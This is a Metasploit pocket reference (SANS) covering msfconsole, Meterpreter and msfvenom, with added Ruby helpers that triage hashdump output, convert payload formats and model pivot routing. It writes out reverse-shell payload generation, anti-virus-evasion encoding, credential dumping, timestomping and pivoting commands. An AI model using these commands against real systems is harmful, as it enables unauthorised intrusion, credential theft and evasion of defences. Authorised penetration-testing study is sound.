Metasploit Cheat Sheet
By Ed Skoudis and Yori Kvitchko
POCKET REFERENCE GUIDE
http://www.sans.org

Purpose
The purpose of this cheat sheet is to describe some common options for some of the various components of the Metasploit Framework.

Tools Described on This Sheet

Metasploit
The Metasploit Framework is a development platform for developing and using security tools and exploits.

Metasploit Meterpreter
The Meterpreter is a payload within the Metasploit Framework which provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.

Metasploit msfvenom
The msfvenom tool is a component of the Metasploit Framework which allows the user to generate a standalone version of any payload within the framework. Payloads can be generated in a variety of formats including executable, Perl script and raw shellcode. The payload can also be encoded to help avoid detection; msfvenom thus encapsulates the functionality of both the old msfpayload and msfencode tools.

Meterpreter Post Modules
With an available Meterpreter session, post modules can be run on the target machine.

Post Modules from Meterpreter
meterpreter > run post/multi/gather/env

Post Modules on a Backgrounded Session
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run

Useful Auxiliary Modules

Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:
msf > use auxiliary/server/socks4
msf > run
Any proxied traffic that matches the subnet of a route will be routed through the session specified by that route. Use proxychains configured for socks4 to route any application's traffic through a Meterpreter session.

msfvenom
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the now removed msfpayload and msfencode. Running it with '-l payloads' gives a list of payloads.
$ msfvenom -p [PayloadPath] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort] -f [FormatType]

Example
Reverse Meterpreter payload as an executable, redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f exe > met.exe

Format Options (specified with -f)
--help-formats - Print out a summary of the available output formats
exe - Executable
pl - Perl
rb - Ruby
raw - Raw shellcode
c - C code

Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Running it with '-l encoders' gives a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType (exe, pl, rb, raw, c)] -i [EncodeIterations] -o [OutputFilename]

Example
Encode a payload 5 times using the shikata_ga_nai encoder and output it as an executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe -o mal.exe
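A worked example for the output of the hashdump post module listed above (post/windows/gather/hashdump prints one pwdump-style line per account, user:RID:LM hash:NT hash:::). This is added code, not part of the SANS sheet or of Metasploit; the dump lines below are constructed, and the only non-empty hashes in them are the widely published LM and NT hashes of the string "password", not credentials from any real host. The two constants are the well-known LM and NT hashes of the empty string.

```ruby
# Parser and triage for pwdump-style hashdump lines:  user:RID:LMhash:NThash:::
# Added example, not Metasploit code.

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee".freeze # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0".freeze # NT hash of the empty string

# Constructed sample dump. The non-empty values are the well-known hashes of
# "password"; none of this comes from a real host.
SAMPLE_DUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  alice:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
  svc_backup:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  [*] this line is module chatter and must be ignored
DUMP

Account = Struct.new(:user, :rid, :lm, :nt) do
  # NT hash equal to the empty-string hash means a blank password (or a disabled
  # account such as Guest); confirm which before trying to use the account.
  def empty_password?
    nt == EMPTY_NT
  end

  # A real LM hash means the password is at most 14 characters and cracks quickly.
  def lm_present?
    lm != EMPTY_LM
  end
end

# Accepts the raw text the module prints and skips anything that is not a hash line.
def parse_hashdump(text)
  text.each_line.filter_map do |line|
    fields = line.strip.split(":")
    next unless fields.size >= 4 && fields[1].match?(/\A\d+\z/) &&
                fields[2].match?(/\A\h{32}\z/) && fields[3].match?(/\A\h{32}\z/)
    Account.new(fields[0], fields[1].to_i, fields[2].downcase, fields[3].downcase)
  end
end

# Returns the users worth looking at first, grouped by finding.
def triage(accounts)
  {
    empty_password: accounts.select(&:empty_password?).map(&:user),
    lm_present:     accounts.select(&:lm_present?).map(&:user),
    # Identical NT hashes mean identical passwords: reuse across accounts.
    shared_nt:      accounts.group_by(&:nt).values
                            .reject { |g| g.size < 2 || g.first.empty_password? }
                            .map { |g| g.map(&:user) }
  }
end

if __FILE__ == $PROGRAM_NAME
  triage(parse_hashdump(SAMPLE_DUMP)).each { |finding, users| puts "#{finding}: #{users.inspect}" }
end
```

Feed it the text copied out of the msfconsole session (or a loot file saved by the module); the filter on 32 hex digits keeps status lines and banners out of the account list.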
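An added example (not from the sheet and not msfvenom's own code) showing what the non-executable entries in the -f format list are: the same payload bytes rendered as raw, C, Perl or Ruby text, and how to get the bytes back out of the text. The sample bytes are a constructed stub, not a real Metasploit payload, and the text layouts approximate msfvenom's output rather than reproducing it exactly.

```ruby
# Converters between the payload text formats msfvenom lists under -f.
# Added example; the layouts approximate msfvenom's output, this is not its code.

# Constructed sample: a few x86 bytes (xor eax,eax ; ret ; padding), not a
# real Metasploit payload, used only to exercise the converters.
SAMPLE_SHELLCODE = "\x31\xc0\xc3\x00\x90\x0a".b.freeze

# Hex-escape every byte, the representation all three text formats share.
def escape_bytes(bytes)
  bytes.each_byte.map { |b| format('\\x%02x', b) }
end

# "-f c" style: an unsigned char array, 16 bytes per source line.
def to_c(bytes, name = "buf")
  lines = escape_bytes(bytes).each_slice(16).map { |chunk| "\"#{chunk.join}\"" }
  "unsigned char #{name}[] =\n#{lines.join("\n")};\n"
end

# "-f pl" and "-f rb" style: a string literal in the scripting language.
def to_script(bytes, lang, name = "buf")
  literal = "\"#{escape_bytes(bytes).join}\""
  case lang
  when :pl then "my $#{name} =\n#{literal};\n"
  when :rb then "#{name} =\n#{literal}\n"
  else raise ArgumentError, "unsupported script format #{lang.inspect}"
  end
end

# Back to "-f raw": pull the \xNN escapes out of any of the text forms. This is
# what a loader needs when the payload was saved as C or Ruby source text.
def to_raw(text)
  text.scan(/\\x(\h{2})/).flatten.map(&:hex).pack("C*")
end
```

The round trip matters in practice: a payload embedded as a C array in a custom dropper, or pasted into a Ruby exploit module, must decode to exactly the bytes msfvenom emitted, or the stager silently breaks.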
Metasploit Console Basics (msfconsole)

Search for a module:
msf > search [regex]

Specify an exploit to use:
msf > use exploit/[ExploitPath]

Specify a payload to use:
msf > set PAYLOAD [PayloadPath]

Show options for the current module:
msf > show options

Set options:
msf > set [Option] [Value]

Start the exploit:
msf > exploit

Metasploit Meterpreter

Base Commands:
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory

File System Commands:
cd: Change directory
lcd: Change directory on the local (attacker's) machine
pwd / getwd: Display the current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove a directory
edit: Open a file in the default editor (typically vi)

Metasploit Meterpreter (contd)

Process Commands:
getpid: Display the process ID that Meterpreter is running inside
getuid: Display the user ID that Meterpreter is running with
ps: Display the process list
kill: Terminate a process given its process ID
execute: Run a given program with the privileges of the process the Meterpreter is loaded in
migrate: Jump to a given destination process ID
- Target process must have the same or lesser privileges
- Target process may be a more stable process
- When inside a process, Meterpreter can access any files that process has a lock on

Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through the TCP session
route: Manage/view the system's routing table

Misc Commands:
idletime: Display the duration that the GUI of the target machine has been idle
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine
screenshot: Save a screenshot of the target machine as an image

Additional Modules:
use [module]: Load the specified module
Example:
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp: Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit -j

List all current jobs (usually exploit listeners):
msf > jobs -l

Kill a job:
msf > jobs -k [JobID]

Multiple Sessions:
List all backgrounded sessions:
msf > sessions -l

Interact with a backgrounded session:
msf > sessions -i [SessionID]

Background the current interactive session:
meterpreter > <Ctrl+Z>
or
meterpreter > background

Routing Through Sessions:
All modules (exploits/post/aux) run against the target subnet will be pivoted through this session.
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]
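An added model of the route table behind "route add [Subnet to Route To] [Subnet Netmask] [SessionID]", which is also what the socks4 proxy server in the Proxy Server entry consults when proxychains hands it a connection. It is not Metasploit's own code; it assumes the framework forwards a destination through the session whose route has the longest matching prefix and leaves unmatched destinations on the attacker's own network stack. The route entries and target addresses are constructed.

```ruby
require "ipaddr"

# Model of the msfconsole route table (added example, not Metasploit code).
# Assumption: longest-prefix match picks the session; no match means the
# attacker's own stack is used.
Route = Struct.new(:subnet, :session)

class RouteTable
  def initialize
    @routes = []
  end

  # Same arguments as "msf > route add [Subnet] [Netmask] [SessionID]".
  def add(subnet, netmask, session)
    @routes << Route.new(IPAddr.new(subnet).mask(netmask), session)
    self
  end

  # Session a destination is pivoted through, or nil when it would go out locally.
  def session_for(dest)
    ip = IPAddr.new(dest)
    best = @routes.select { |r| r.subnet.include?(ip) }.max_by { |r| r.subnet.prefix }
    best && best.session
  end

  # Targets (e.g. an RHOSTS list) that no route covers: a scan through the
  # socks4 proxy or a pivoted module would reach these from the attacker's own
  # address rather than through a session, which is usually a mistake.
  def unrouted(targets)
    targets.reject { |t| session_for(t) }
  end

  # Rows in the order they were added, for a quick check against "route print".
  def rows
    @routes.map { |r| [r.subnet.to_s, r.subnet.prefix, r.session] }
  end
end

# Constructed pivot set-up: two sessions, the second one deeper inside 10.10.10.0/24.
PIVOT = RouteTable.new
             .add("10.10.10.0", "255.255.255.0", 1)
             .add("10.10.10.128", "255.255.255.128", 2)
             .add("192.168.0.0", "255.255.0.0", 1)
```

Before launching a scanner module or proxychains against a pivoted network, run the intended target list through unrouted; a netmask typo in route add shows up there as a target that would leave the attacker's box directly instead of going through the session.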